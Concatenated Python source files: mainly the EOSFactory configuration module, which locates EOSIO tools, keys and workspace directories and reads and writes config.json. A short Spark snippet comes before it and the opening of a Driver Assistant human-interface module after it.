sc = self.connector.ipython.user_ns.get('sc')
if sc and isinstance(sc, SparkContext):
history_url = 'http://' + socket.gethostbyname(socket.getfqdn()) + ':' + '8080'
conn_config['sparkhistoryserver'] = history_url
return conn_config
|
<gh_stars>0
import os
import stat
import argparse
import json
import re
import subprocess
import eosfactory
import eosfactory.core.errors as errors
import eosfactory.core.logger as logger
import eosfactory.core.utils as utils
VERSION = "3.3.0"
EOSIO_VERSION = "1.8.0"
EOSIO_CDT_VERSION = "1.6.1"
PYTHON_VERSION = "3.5 or higher"
EOSFACTORY_DIR = "eosfactory/"
TMP = "/tmp/eosfactory/"
SETUPTOOLS_NAME = "eosfactory_tokenika"
EOSIO_CDT_PATTERN = r".+/eosio\.cdt/(\d\.\d\.\d)/.*"
UBUNTU_PATTERN = r"\s*\"(.*CanonicalGroupLimited.Ubuntu.*/LocalState/rootfs)/.*"
BUILD = "build"
IGNORE_FILE = ".eosideignore"
IGNORE_LIST = [".vscode/ipch/*", ".vscode/settings.json", ".vscode/tasks.json",\
"build/*","command_lines.txt"]
LOCALHOST_HTTP_ADDRESS = "127.0.0.1:8888"
DEFAULT_TEMPLATE = "hello_world"
FROM_HERE_TO_EOSF_DIR = "../../../"
CONFIG_DIR = "config"
CONFIG_JSON = "config.json"
CONTRACTS_DIR = "contracts/"
TEMPLATE_DIR = ("TEMPLATE_DIR", "templates/contracts")
PROJECT_0 = "empty_project"
eosfactory_data_ = ("EOSFACTORY_DATA_DIR",
[os.path.expandvars("${HOME}/.local/" + EOSFACTORY_DIR),\
"/usr/local/" + EOSFACTORY_DIR,],
[])
node_address_ = ("LOCAL_NODE_ADDRESS", [LOCALHOST_HTTP_ADDRESS])
wallet_address_ = ("WALLET_MANAGER_ADDRESS", [LOCALHOST_HTTP_ADDRESS])
genesis_json_ = ("EOSIO_GENESIS_JSON",
["/home/cartman/.local/share/eosio/nodeos/config/genesis.json"])
nodeos_config_dir_ = ("NODEOS_CONFIG_DIR", [None])
nodeos_data_dir_ = ("NODEOS_DATA_DIR", [None])
nodeos_options_ = ("NODEOS_OPTIONS", [])
keosd_wallet_dir_ = ("KEOSD_WALLET_DIR", ["${HOME}/eosio-wallet/"])
chain_state_db_size_mb_ = ("EOSIO_SHARED_MEMORY_SIZE_MB", ["300"])
wsl_root_ = ("WSL_ROOT", [None])
nodeos_stdout_ = ("NODEOS_STDOUT", [None])
includes_ = ("INCLUDE", "includes")
libs_ = ("LIBS", "libs")
cli_exe_ = ("EOSIO_CLI_EXECUTABLE",
["cleos", "/usr/bin/cleos", "/usr/local/bin/cleos"])
keosd_exe_ = ("KEOSD_EXECUTABLE",
["keosd","/usr/bin/keosd", "/usr/local/bin/keosd"])
node_exe_ = ("LOCAL_NODE_EXECUTABLE",
["nodeos","/usr/bin/nodeos", "/usr/local/bin/nodeos"])
eosio_cpp_ = ("EOSIO_CPP",
["eosio-cpp", "/usr/bin/eosio-cpp", "/usr/local/bin/eosio-cpp"])
eosio_cdt_root_ = ("EOSIO_CDT_ROOT",
["/usr/opt/eosio.cdt/0.0.0/", "/usr/local/Cellar/eosio.cdt/0.0.0/opt/eosio.cdt/"])
eosio_cpp_includes_ = (
"EOSIO_CPP_INCLUDES",
[["include", "include/libcxx", "include/eosiolib/core", \
"include/eosiolib/contracts"]])
key_private_ = (
"EOSIO_KEY_PRIVATE",
["<KEY>"])
key_public_ = (
"EOSIO_KEY_PUBLIC",
["EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV"])
contract_workspace_dir_ = (
"EOSIO_CONTRACT_WORKSPACE", [CONTRACTS_DIR])
def eosfactory_data():
'''Data directory.
For developer's installation, data is in the root of the installation.
.: wsl_root.sh
config: config.ini, config.json, genesis.json, ...
contracts: eosio_token, hello_world, tic_tac_toe, ...
templates: contracts, ...
includes: eoside, ...
libs: ...
'''
tested = []
is_not_linked = is_site_package()
if not is_not_linked:
path = eosf_dir()
tested.append(path)
if os.path.exists(os.path.join(path, "config", "config.ini")):
return path
elif is_not_linked == 1:
for path in eosfactory_data_[1]:
tested.append(path)
if os.path.exists(os.path.join(path, "config", "config.ini")):
return path
elif is_not_linked == 2:
for path in eosfactory_data_[2]:
tested.append(path)
if os.path.exists(os.path.join(path, "config", "config.ini")):
return path
msg = "Cannot determine the directory of application data. Tried:"
for path in tested:
msg = '''{}
{}
'''.format(msg, path)
raise errors.Error(msg, translate=False)
def is_site_package():
is_local_or_system = -1
eosfactory_path = eosfactory.__path__
for item in eosfactory_path:
if "site-packages" in item:
if "local" in item:
is_local_or_system = 1
else:
is_local_or_system = 2
break
if "eosfactory/eosfactory" in item:
is_local_or_system = 0
# No EOSFactory:
# import eosfactory
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# ModuleNotFoundError: No module named 'eosfactory'
# developer's installation:
# >>> import eosfactory
# >>> print(eosfactory.__path__)
# ['/mnt/c/Workspaces/EOS/eosfactory/eosfactory']
if is_local_or_system == -1:
raise errors.Error('''
Cannot determine the configuration directory. 'eosfactory.__path__' is
{}
'''.format(eosfactory_path), translate=False)
return is_local_or_system
def set_contract_workspace_dir(contract_workspace_dir=None, is_set=False):
from termcolor import cprint, colored
import pathlib
def tilde(tilde_path):
return tilde_path.replace("~", str(pathlib.Path.home()))
def set(contract_workspace_dir):
if contract_workspace_dir:
path = utils.wslMapWindowsLinux(contract_workspace_dir)
if os.path.exists(path) and os.path.isdir(path):
map = config_map()
map[contract_workspace_dir_[0]] = path
write_config_map(map)
return True
return False
if set(contract_workspace_dir):
return
current_path_color = "green"
error_path_color = "red"
while True:
map = config_map()
contract_workspace_dir = None
if contract_workspace_dir_[0] in map:
contract_workspace_dir = map[contract_workspace_dir_[0]]
else:
contract_workspace_dir = os.path.join(TMP, CONTRACTS_DIR)
input_msg = utils.heredoc('''
Where do you prefer to keep your smart-contract projects?
The current location is:
{}
Otherwise, input another existing directory path, or nothing to
keep the current one:
'''.format(colored(contract_workspace_dir, current_path_color))
) if os.path.exists(contract_workspace_dir) else utils.heredoc('''
Where do you prefer to keep your smart-contract projects?
The set location is:
{}
but it does not exist. Input an existing directory path:
'''.format(colored(contract_workspace_dir, current_path_color))
)
new_dir = tilde(input(input_msg + "\n"))
if not new_dir:
new_dir = contract_workspace_dir
if set(new_dir):
print("OK")
break
else:
print("\n" + utils.heredoc('''
The path you entered:
{}
doesn't seem to exist!
''').format(colored(new_dir, error_path_color)) + "\n")
def config_dir():
path = os.path.join(eosfactory_data(), CONFIG_DIR)
if not os.path.exists(path):
raise errors.Error('''
Cannot find the configuration directory
{}
'''.format(path), translate=False)
return path
def template_dir():
path = os.path.join(eosfactory_data(), TEMPLATE_DIR[1])
if not os.path.exists(path):
raise errors.Error('''
Cannot find the template directory
{}
'''.format(path), translate=False)
return path
def eoside_includes_dir():
'''The directory for contract definition includes.
It may be set with
*INCLUDE* entry in the *config.json* file,
see :func:`.current_config`.
'''
path = includes_[1]
if not os.path.isabs(path):
path = os.path.join(eosfactory_data(), includes_[1])
if not os.path.exists(path):
path = None
return path
def eoside_libs_dir():
'''The directory for contract links.
It may be set with
*LIBS* entry in the *config.json* file,
see :func:`.current_config`.
'''
path = libs_[1]
if not os.path.isabs(path):
path = os.path.join(eosfactory_data(), libs_[1])
if not os.path.exists(path):
path = None
return path
def contract_workspace_dir(dont_set_workspace=False):
'''The absolute path to the contract workspace.
The contract workspace is a directory where automatically created projects
are placed by default. It is set while EOSFactory is installed.
If not set, the projects are stored in the `.config.CONTRACTS_DIR`
subdirectory (typically *contracts/*) of the EOSFActory installation, if
EOSFactory is installed from its GitHub repository, otherwise, they go to
a directory specified as
`join(.config.TMP, .config.CONTRACTS_DIR)`.
The setting may be changed with
*EOSIO_CONTRACT_WORKSPACE* entry in the *config.json* file,
see :func:`.current_config`.
Args:
dont_set_workspace (bool): If set, do not query for empty workspace
directory.
'''
if dont_set_workspace:
return config_map()[contract_workspace_dir_[0]]
if not contract_workspace_dir_[0] in config_map():
set_contract_workspace_dir()
workspace_dir = config_value(contract_workspace_dir_)
path = utils.wslMapWindowsLinux(workspace_dir)
if os.path.isabs(path):
if os.path.exists(path):
return path
else:
raise errors.Error('''
The path
'{}',
set as the contract workspace directory, does not exist.
'''.format(path), translate=False)
else:
if not is_site_package():
path = os.path.join(eosf_dir(), path)
else:
path = os.path.join(TMP, path)
if not os.path.exists(path):
os.makedirs(path)
if os.path.exists(path):
return path
else:
raise errors.Error('''
The path
'{}'
resolved as the contract workspace directory directory does not exist.
'''.format(workspace_dir, translate=False)
)
return path
def eosf_dir():
'''The absolute directory of the EOSFactory installation.
'''
path = os.path.realpath(os.path.join(
os.path.realpath(__file__), FROM_HERE_TO_EOSF_DIR))
if os.path.exists(path):
return path
raise errors.Error('''
Cannot determine the root directory of the EOSFactory installation.
The path to the file 'config.py' is
'{}'.
The expected installation path, which is
'{}',
is reported as non-existent.
'''.format(__file__, path), translate=False)
def eosio_key_private():
'''*eosio* account private key.
A private key used as the value of the option *signature-provider* in
the command line for the *nodeos* executable.
It may be changed with
*EOSIO_KEY_PRIVATE* entry in the *config.json* file,
see :func:`.current_config`.
'''
return config_value_checked(key_private_)
def eosio_key_public():
'''*eosio* account public key.
A public key used as the value of the option *signature-provider* in
the command line for the *nodeos* executable.
It may be changed with
*EOSIO_KEY_PUBLIC* entry in the *config.json* file,
see :func:`.current_config`.
'''
return config_value_checked(key_public_)
def chain_state_db_size_mb():
'''The size of the buffer of the local node.
The value of the option *chain-state-db-size-mb* in the command line for
the *nodeos* executable.
It may be changed with
*EOSIO_SHARED_MEMORY_SIZE_MB* entry in the *config.json* file,
see :func:`.current_config`.
'''
return config_value_checked(chain_state_db_size_mb_)
def wsl_root():
'''The root directory of the Windows WSL, or empty string if not Windows.
The root directory of the Ubuntu file system, owned by the installation,
if any, of the Windows Subsystem Linux (WSL).
It may be changed with
*WSL_ROOT* entry in the *config.json* file,
see :func:`.current_config`.
'''
if not utils.is_windows_ubuntu():
return ""
wsl_root_sh = "wsl_root.sh"
wsl_root_sh = os.path.join(eosfactory_data(), wsl_root_sh)
if wsl_root_[1][0] is None:
path = ""
path, error = utils.spawn(
[wsl_root_sh, path], raise_exception=False)
if error:
while True:
if not os.path.exists(wsl_root_sh):
path = ""
logger.ERROR('''
Cannot find the bash command:
'{}'
The intelisense feature of Visual Studio Code will be disabled.
'''.format(wsl_root_sh), translate=False)
break
path = input(logger.error('''
Error message is
{}
Cannot find the root of the WSL file system which was tried to be
'{}'
Please, find the path in your computer and enter it. Enter nothing, if you do
not care about having efficient the intelisense of Visual Studio Code.
'''.format(error, path), translate=False) + "\n<<< ")
if not path:
break
path, error = utils.spawn(
[wsl_root_sh, path], raise_exception=False)
if not error:
break
path = path.replace("\\", "/")
path = path.replace(path[0:2], path[0:2].lower())
wsl_root_[1][0] = path
return wsl_root_[1][0]
def nodeos_stdout():
'''Set *stdout* file for the *stdout* stream of the local node.
If the value of *NODEOS_STDOUT* entry in the *config.json* file is set,
the local node logs to the specified file its output,
see :func:`.current_config`.
Note:
The same may be achieved with the *nodeos_stdout* argument in the
function :func:`.core.manager.resume`.
'''
return config_value(nodeos_stdout_)
def http_server_address():
'''The http/https URL where local *nodeos* is running.
The setting may be changed with
*LOCAL_NODE_ADDRESS* entry in the *config.json* file,
see :func:`.current_config`.
'''
return config_value_checked(node_address_)
def http_wallet_address():
'''The http/https URL where keosd is running.
The setting may be changed with
*WALLET_MANAGER_ADDRESS* entry in the *config.json* file,
see :func:`.current_config`.
'''
retval = config_value(wallet_address_)
if not retval:
retval = http_server_address()
return retval
def node_exe():
'''The path to the *nodeos* executable.
The setting may be changed with
*LOCAL_NODE_EXECUTABLE* entry in the *config.json* file,
see :func:`.current_config`.
'''
return first_valid_which(node_exe_)
def cli_exe():
'''The path to the *cleos* executable.
The setting may be changed with
*EOSIO_CLI_EXECUTABLE* entry in the *config.json* file,
see :func:`.current_config`.
'''
return first_valid_which(cli_exe_)
def keosd_exe():
'''The path to the *keosd* executable.
The setting may be changed with
*KEOSD_EXECUTABLE* entry in the *config.json* file,
see :func:`.current_config`.
'''
return first_valid_which(keosd_exe_)
def eosio_cpp():
'''The path to the *eosio-cpp* executable.
The setting may be changed with
*EOSIO_CPP* entry in the *config.json* file,
see :func:`.current_config`.
'''
return first_valid_which(eosio_cpp_)
def eosio_version():
try:
version = subprocess.check_output(
"echo $({} --version)".format(node_exe()), shell=True,
timeout=10).decode("ISO-8859-1").strip().replace("v", "")
retval = [version]
if not version.split(".")[:2] == EOSIO_VERSION.split(".")[:2]:
retval.append(EOSIO_VERSION)
return retval
except Exception as e:
return ["", EOSIO_VERSION]
def eosio_cpp_version():
try:
version = subprocess.check_output(
[eosio_cpp(), "-version"], timeout=5).decode("ISO-8859-1").strip()\
.replace("eosio-cpp version ", "")
retval = [version]
if not version.split(".")[:2] == EOSIO_CDT_VERSION.split(".")[:2]:
retval.append(EOSIO_CDT_VERSION)
return retval
except Exception as e:
return ["", EOSIO_CDT_VERSION]
def eosio_cdt_root():
'''The path to the *eosio-cpp* installation directory.
The setting may be changed with
*EOSIO_CPP* entry in the *config.json* file,
see :func:`.current_config`.
'''
# find /usr -wholename "*/eosio.cdt/1.6.1"
config_json = config_map()
if eosio_cdt_root_[0] in config_json and config_json[eosio_cdt_root_[0]]:
return config_json[eosio_cdt_root_[0]]
eosio_cpp_version_ = eosio_cpp_version()
if not eosio_cpp_version_:
raise errors.Error(
'''
'eosio-cpp' does not response.
''')
version_pattern = re.compile(EOSIO_CDT_PATTERN)
tested = []
for path in eosio_cdt_root_[1]:
tested.append(path)
if version_pattern.match(path):
path = path.replace(
re.findall(version_pattern, path)[0], eosio_cpp_version_[0])
if(os.path.exists(path)):
return path
msg = "Cannot determine the installation directory of 'eosio-cdt. Tried:"
for path in tested:
msg = '''{}
{}
'''.format(msg, path)
msg = '''{}
Define it in the config file
{}
'''.format(msg, config_file())
raise errors.Error(msg, translate=False)
def eosio_cpp_includes():
'''The list of eosio-cpp includes.
The setting may be changed with *EOSIO_CPP* entry in the *config.json*
file, see :func:`.current_config`.
'''
list = []
path = eosio_cdt_root()
for include in eosio_cpp_includes_[1][0]:
list.append(path + include)
return list
def keosd_wallet_dir(raise_error=True):
'''The path to the local wallet directory.
The path is hard-coded in the *keosd* wallet manager.
Args:
raise_error (bool): If set, rise an error if the path is invalid.
Raises:
.core.errors.Error: If the directory does not exist.
'''
path = first_valid_path(keosd_wallet_dir_, raise_error=False)
if not path:
from eosfactory.core.cleos import WalletList
WalletList()
path = first_valid_path(keosd_wallet_dir_, raise_error=False)
if not path:
if raise_error:
raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(keosd_wallet_dir_[0], keosd_wallet_dir_[1]),
translate=False)
return path
def config_file():
'''The path to the *config.json* file.
'''
file = os.path.join(config_dir(), CONFIG_JSON)
if not os.path.exists(file):
try:
with open(file, "w+") as f:
f.write("{}")
except Exception as e:
raise errors.Error(str(e), translate=False)
return file
def config_map():
'''Return a JSON object read from the *config.json* file.
Raises:
.core.errors.Error: If the JSON object cannot be returned.
'''
path = config_file()
if os.path.exists(path):
try:
with open(path, "r") as input:
text = input.read()
if not text:
return {}
else:
return json.loads(text)
except Exception as e:
raise errors.Error(str(e), translate=False)
raise errors.Error('''
Cannot find the config file.
''', translate=False)
def write_config_map(map):
'''Write the given json object to *config.json*.
Args:
map (json): The json object to be saved.
Raises:
.core.errors.Error: If the JSON object cannot be saved.
'''
path = config_file()
if os.path.exists(path):
with open(path, "w+") as output:
output.write(json.dumps(map, indent=4))
return
raise errors.Error('''
Cannot find the config file.
''', translate=False)
def config_values(config_list):
'''List values ascribed to the key of a hard-codded configuration list.
First, consider the *config.json*, next the values of the hard-codded
configuration list.
Args:
config_list (tuple): A configure list tuple.
'''
config_key = config_list[0]
retval = []
# First, configure file ...
config_json = config_map()
if config_key in config_json and config_json[config_key]:
retval.append(config_json[config_key])
return retval
# Finally, hard-codded values, if any.
values = config_list[1]
if values:
return values
return retval
def config_value(config_list):
'''Get the first item from :func:`.config_values`.
Args:
config_list (()): A configure list tuple.
'''
retval = config_values(config_list)
return retval[0] if retval else None
def config_value_checked(config_list):
'''Get the first item from :func:`.config_values`. Raise an error if fails.
Args:
config_list (tuple): A configure list tuple.
Raises:
.core.errors.Error: If the result is not defined.
'''
retval = config_value(config_list)
if not retval is None:
return retval
raise errors.Error('''
The value of {} is not defined.
Tried:
{}
Define it in the config file
{}
'''.format(config_list[0], config_list[1], config_file()), translate=False)
def first_valid_which(config_list, find_file=None, raise_error=True):
'''Given a key to the config list, get a valid file system path.
Applicable if the *config_list* argument refers to a file path.
The path may be absolute or relative to the root of the EOSFactory
installation.
Also, the path may be relative to the *HOME* environment variable.
Args:
config_list (tuple): A configure list tuple.
find_file (str): If set, the given file has to exist.
raise_error (bool): If set, raise an error on failure.
Raises:
.core.errors.Error: If the *raise_error* argument is set and the \
result is not defined.
'''
values = config_values(config_list)
if values[0]:
for path in values:
if os.path.isabs(path):
if find_file:
if os.path.exists(os.path.join(path, find_file)):
return path
else:
if utils.which(path):
return path
if raise_error:
config_values(config_list)
raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(config_list[0], config_list[1]), translate=False)
else:
return None
def first_valid_path(config_list, find_file=None, raise_error=True):
'''Given a key to the config list, get a valid file system path.
Applicable if the *config_list* argument refers to a file path.
The path may be absolute or relative to the root of the EOSFactory
installation.
Also, the path may be relative to the *HOME* environment variable.
Args:
config_list (tuple): A configure list tuple.
find_file (str): If set, the given file has to exist.
raise_error (bool): If set, raise an error on failure.
Raises:
.core.errors.Error: If the *raise_error* argument is set and the \
result is not defined.
'''
values = config_values(config_list)
if values[0]:
for path in values:
if "${HOME}" in path:
home = None
if "HOME" in os.environ:
home = os.environ["HOME"]
if home:
path = path.replace("${HOME}", home)
if find_file:
if os.path.exists(os.path.join(path, find_file)):
return path
else:
if os.path.exists(path):
return path
if os.path.isabs(path):
if find_file:
if os.path.exists(os.path.join(path, find_file)):
return path
else:
if os.path.exists(path):
return path
if raise_error:
raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(config_list[0], config_list[1]), translate=False)
else:
return None
def nodeos_data_dir():
'''Directory containing runtime data of *nodeos*.
It may be changed with
*NODEOS_DATA_DIR* entry in the *config.json* file,
see :func:`.current_config`.
'''
return nodeos_data_dir_[1][0]
def nodeos_config_dir():
'''Directory containing configuration files such as config.ini.
It may be changed with
*NODEOS_CONFIG_DIR* entry in the *config.json* file,
see :func:`.current_config`.
'''
return nodeos_config_dir_[1][0]
def nodeos_options():
'''
'''
return nodeos_options_[1]
def genesis_json():
'''File to read Genesis State from.
It may be changed with
*EOSIO_GENESIS_JSON* entry in the *config.json* file,
see :func:`.current_config`.
'''
path = first_valid_path(genesis_json_, raise_error=False)
if not path:
path = os.path.join(config_dir(), "genesis.json")
if not os.path.exists(path):
return None
return path
def contract_dir(contract_dir_hint):
'''Given a hint, determine the contract root directory.
The ``contract_dir_hint`` is tested to be either
- an absolute path, or
- a path relative to either
- the directory given with :func:`contract_workspace`, or
- the directory given with :func:`eosf_dir` ``/contracts``.
Args:
contract_dir_hint (path): A directory path, may be not absolute.
Raises:
.core.errors.Error: If the result is not defined.
'''
contract_dir_hint = utils.wslMapWindowsLinux(contract_dir_hint)
# ? the absolute path to a contract directory
trace = contract_dir_hint + "\n"
if os.path.isfile(contract_dir_hint):
contract_dir_hint = os.path.dirname(contract_dir_hint)
if os.path.isabs(contract_dir_hint):
if os.path.exists(contract_dir_hint):
return os.path.realpath(contract_dir_hint)
# ? the relative path to a contract directory, relative to the directory
# set with the 'contract_workspace_dir()' function
contract_dir_ = os.path.join(
contract_workspace_dir(), contract_dir_hint)
trace = trace + contract_dir_ + "\n"
if os.path.isdir(contract_dir_):
if os.path.exists(contract_dir_):
return os.path.realpath(contract_dir_)
# ? the relative path to a contract directory, relative to
# 'eosfactory_data()/contracts'
contract_dir_ = os.path.join(
eosfactory_data(), CONTRACTS_DIR, contract_dir_hint)
trace = trace + contract_dir_ + "\n"
if os.path.isdir(contract_dir_):
if os.path.exists(contract_dir_):
return os.path.realpath(contract_dir_)
raise errors.Error('''
Cannot determine the contract directory.
Tried:
{}
'''.format(trace), translate=False)
def source_files(search_dir, extensions, recursively=False):
'''List files CPP/C and ABI files from the given directory
'''
srcs = []
paths = os.listdir(search_dir)
for file in paths:
path = os.path.join(search_dir, file)
if os.path.isfile(path):
if os.path.splitext(file)[1] in extensions:
srcs.append(os.path.realpath(path))
elif recursively:
srcs.extend(source_files(path, extensions, recursively))
return srcs
def contract_source_files(contract_dir_hint):
'''List files CPP/C and ABI files from directory given a hint.
Args:
contract_dir_hint (str): An argument to the function
:func:`.contract_dir`
Raises:
.core.errors.Error: If the list is empty.
'''
contract_dir_ = contract_dir(contract_dir_hint)
trace = contract_dir_ + "\n"
search_dir = contract_dir_
srcs = source_files(search_dir, [".c", ".cpp",".cxx", ".c++"], recursively=True)
if srcs:
return (search_dir, srcs)
raise errors.Error('''
Cannot find any contract source directory.
Tried:
{}
'''.format(trace), translate=False)
def abi_file(contract_dir_hint):
'''Given the contract directory, return the ABI file path.
See :func:`contract_file`.
Args:
contract_dir_hint: A directory path, may be not absolute.
Raises:
.core.errors.Error: If the result is not defined.
'''
search_dir = os.path.join(contract_dir(contract_dir_hint), BUILD)
if not os.path.exists(search_dir):
return
files_ = source_files(search_dir, [".abi"])
if not files_:
return
files = []
for file_ in files_:
if os.path.basename(os.path.dirname(file_)) == BUILD\
or os.path.dirname(file_) == search_dir:
files.append(file_)
if len(files) > 1:
raise errors.Error('''
There is too many ABI files in the contract build folder
{}
There are files:
{}
'''.format(search_dir, "\n".join(files)))
return files[0]
def wasm_file(contract_dir_hint):
'''Given the contract directory, return the WASM file path.
See :func:`contract_file`.
Args:
contract_dir_hint: A directory path, may be not absolute.
Raises:
.core.errors.Error: If the result is not defined.
'''
search_dir = os.path.join(contract_dir(contract_dir_hint), BUILD)
if not os.path.exists(search_dir):
return
files_ = source_files(search_dir, [".wasm"])
if not files_:
return
files = []
for file_ in files_:
if os.path.basename(os.path.dirname(file_)) == BUILD\
or os.path.dirname(file_) == search_dir:
files.append(file_)
if len(files) > 1:
raise errors.Error('''
There is too many WASM files in the contract build folder
{}
There are files:
{}
'''.format(search_dir, "\n".join(files)))
return files[0]
def update_vscode(c_cpp_properties_path):
c_cpp_properties_path = utils.wslMapWindowsLinux(c_cpp_properties_path)
with open(c_cpp_properties_path) as f:
c_cpp_properties = f.read()
pattern = re.compile(EOSIO_CDT_PATTERN)
if re.findall(pattern, c_cpp_properties):
new = c_cpp_properties.replace(re.findall(
pattern, c_cpp_properties)[0], eosio_cpp_version()[0])
if not new == c_cpp_properties:
with open(c_cpp_properties_path,'w') as f:
f.write(new)
pattern = re.compile(UBUNTU_PATTERN)
root = wsl_root()
if root:
if re.findall(pattern, c_cpp_properties):
new = c_cpp_properties.replace(
re.findall(pattern, c_cpp_properties)[0], root)
if not new == c_cpp_properties:
with open(c_cpp_properties_path,'w') as f:
f.write(new)
def not_defined(config_map):
retval = {}
for key, value in config_map.items():
if value == None or value is None:
retval[key] = value
return retval
def installation_dependencies(config_map):
'''Verify whether 'eosio' and 'eosio.cpp' packages are properly installed.
'''
eosio_version_ = config_map["EOSIO_VERSION"]
if eosio_version_ and eosio_version_[0]:
if len(eosio_version_) > 1:
print('''NOTE!
The version of the installed 'eosio' package is {} while EOSFactory was tested
with version {}
'''.format(
eosio_version_[0], eosio_version_[1]))
else:
print('''Cannot determine the version of the installed 'eosio' package as 'nodeos' does not response.
''')
eosio_cpp_version_ = config_map["EOSIO_CDT_VERSION"]
if eosio_cpp_version_:
if len(eosio_cpp_version_) > 1:
print('''NOTE!
The version of the installed 'eosio.cdt' package is {} while EOSFactory was tested with version {}
'''.format(eosio_cpp_version_[0], eosio_cpp_version_[1]))
else:
print('''Cannot determine the version of the installed 'eosio.cdt' package as 'eosio-cpp' does not response.
''')
def current_config(contract_dir=None, dont_set_workspace=False):
'''Present the current configuration.
The current configuration result from both the *config.json* file setting
and default hard-codded setup. The *config.json* prevails.
Args:
contract_dir str(): If set
Note:
The current configuration can be seen with the bash command:
*python3 -m eosfactory.core.config*
'''
map = {}
map["CONFIG_FILE"] = config_file()
if not is_site_package():
try:
map["EOSFACTORY_DIR"] = eosf_dir()
except:
map["EOSFACTORY_DIR"] = None
map["VERSION"] = VERSION
try:
map[node_address_[0]] = http_server_address()
except:
map[node_address_[0]] = None
try:
map[key_private_[0]] = eosio_key_private()
except:
map[key_private_[0]] = None
try:
map[key_public_[0]] = eosio_key_public()
except:
map[key_public_[0]] = None
try:
map[wsl_root_[0]] = wsl_root()
except:
map[wsl_root_[0]] = None
try:
map[wallet_address_[0]] = http_wallet_address() \
if http_wallet_address() else http_server_address()
except:
map[wallet_address_[0]] = None
try:
map[chain_state_db_size_mb_[0]] = chain_state_db_size_mb()
except:
map[chain_state_db_size_mb_[0]] = None
try:
map[contract_workspace_dir_[0]] = contract_workspace_dir(
dont_set_workspace)
except:
map[contract_workspace_dir_[0]] = None
try:
map[keosd_wallet_dir_[0]] = keosd_wallet_dir()
except:
map[keosd_wallet_dir_[0]] = None
try:
map[cli_exe_[0]] = cli_exe()
except:
map[cli_exe_[0]] = None
try:
map[keosd_exe_[0]] = keosd_exe()
except:
map[keosd_exe_[0]] = None
try:
map[node_exe_[0]] = node_exe()
except:
map[node_exe_[0]] = None
try:
map[eosio_cpp_[0]] = eosio_cpp()
except:
map[eosio_cpp_[0]] = None
try:
map[eosio_cdt_root_[0]] = eosio_cdt_root()
except:
map[eosio_cdt_root_[0]] = None
try:
map[eosio_cpp_includes_[0]] = eosio_cpp_includes()
except:
map[eosio_cpp_includes_[0]] = None
try:
map[includes_[0]] = eoside_includes_dir()
except:
map[libs_[0]] = None
try:
map[libs_[0]] = eoside_libs_dir()
except:
map[libs_[0]] = None
try:
map[eosfactory_data_[0]] = eosfactory_data()
except:
map[eosfactory_data_[0]] = None
try:
map[TEMPLATE_DIR[0]] = template_dir()
except:
map[TEMPLATE_DIR[0]] = None
map[genesis_json_[0]] = genesis_json()
map[nodeos_config_dir_[0]] = nodeos_config_dir()
map[nodeos_data_dir_[0]] = nodeos_data_dir()
map[nodeos_options_[0]] = nodeos_options()
map["EOSIO_VERSION"] = eosio_version()
map["EOSIO_CDT_VERSION"] = eosio_cpp_version()
map[nodeos_stdout_[0]] = nodeos_stdout()
if contract_dir:
contract_dir = contract_dir(contract_dir)
try:
map["contract-dir"] = contract_dir
except:
map["contract-dir"] = None
try:
map["contract-wast"] = wast_file(contract_dir)
except:
map["contract-wast"] = None
try:
map["contract-wasm"] = wasm_file(contract_dir)
except:
map["contract-wasm"] = None
try:
map["contract-abi"] = abi_file(contract_dir)
except:
map["contract-abi"] = None
return map
def config():
print('''
EOSFactory version {}.
Dependencies:
https://github.com/EOSIO/eos version {}
https://github.com/EOSIO/eosio.cdt version {}
Python version {}
'''.format(VERSION, EOSIO_VERSION, EOSIO_CDT_VERSION, PYTHON_VERSION)
)
is_not_linked = is_site_package()
if not is_not_linked:
print(
'''EOSFactory package is installed as a link to the directory:
'{}'
'''.format(os.path.join(eosf_dir(), EOSFACTORY_DIR))
)
elif is_not_linked == 1:
print(
'''EOSFactory is installed as a site package locally.
'''
)
elif is_not_linked == 2:
print(
'''EOSFactory is installed as a site package globally.
'''
)
config_map = current_config()
installation_dependencies(config_map)
print('''
The current configuration of EOSFactory:
{}
You can overwrite the above settings with entries in the configuration
file located here:
{}
'''.format(
json.dumps(
config_map, sort_keys=True, indent=4), config_file())
)
not_defined_ = not_defined(config_map)
if not_defined_:
print('''
There are undefined setting:
{}
'''.format(json.dumps(not_defined_, sort_keys=True, indent=4)))
def main():
'''
usage: config.py [-h] [--wsl_root] [--dependencies] [--json]
[--workspace WORKSPACE]
Show the configuration of EOSFactory or set contract workspace.
Args:
-h, --help Show this help message and exit
--wsl_root Show set the root of the WSL and exit.
--dependencies List dependencies of EOSFactory and exit.
--dont_set_workspace Ignore empty workspace directory.
--json Bare config JSON and exit.
--workspace WORKSPACE Set contract workspace and exit.
'''
parser = argparse.ArgumentParser(description='''
Show the configuration of EOSFactory or set contract workspace.
''')
parser.add_argument(
"--wsl_root", help="Show set the root of the WSL and exit.",
action="store_true")
parser.add_argument(
"--dependencies", help="List dependencies of EOSFactory and exit.",
action="store_true")
parser.add_argument(
"--dont_set_workspace", help="Ignore empty workspace directory.",
action="store_true")
parser.add_argument(
"--json", help="Bare config JSON and exit.",
action="store_true")
parser.add_argument(
"--workspace", help="Set contract workspace and exit.",
action="store_true")
args = parser.parse_args()
if args.dependencies:
installation_dependencies(current_config())
elif args.json:
print(json.dumps(
current_config(dont_set_workspace=args.dont_set_workspace),
sort_keys=True, indent=4))
elif args.wsl_root:
wsl_root()
elif args.workspace:
set_contract_workspace_dir()
else:
config()
if __name__ == '__main__':
main()
|
"""Classes and functions for the human interface for the Driver Assistant env.
The human interface is designed to allow a human user manually control
the assistant system. This includes modifying the signal sent to the
driver (i.e. 'x', 'y', 'vx', 'vy') as well as the recommended
acceleratio and steering.
Specifically, at each step the human controlled assistant will send
signals and recommendations that equal to the observed values
(in the case of the signals) or 0.0 (in case of the recommendations)
plus the offset specified by the human user.
The offset for each parameter: 'x', 'y', 'vx', 'vy' can be increased or
deacresed using the following keys:
parameter increase decrease
-----------------------------------
'x' Q A
'y' W S
'v E D
'vy' R F
'acceleration' Right Left
'steering' Up Down
Where Right, Left, Up, Down correspond to the arrow keys on the
keyboard.
"""
import os.path as osp
from typing import TYPE_CHECKING, Tuple, List, Optional
import numpy as np
import pygame as pg
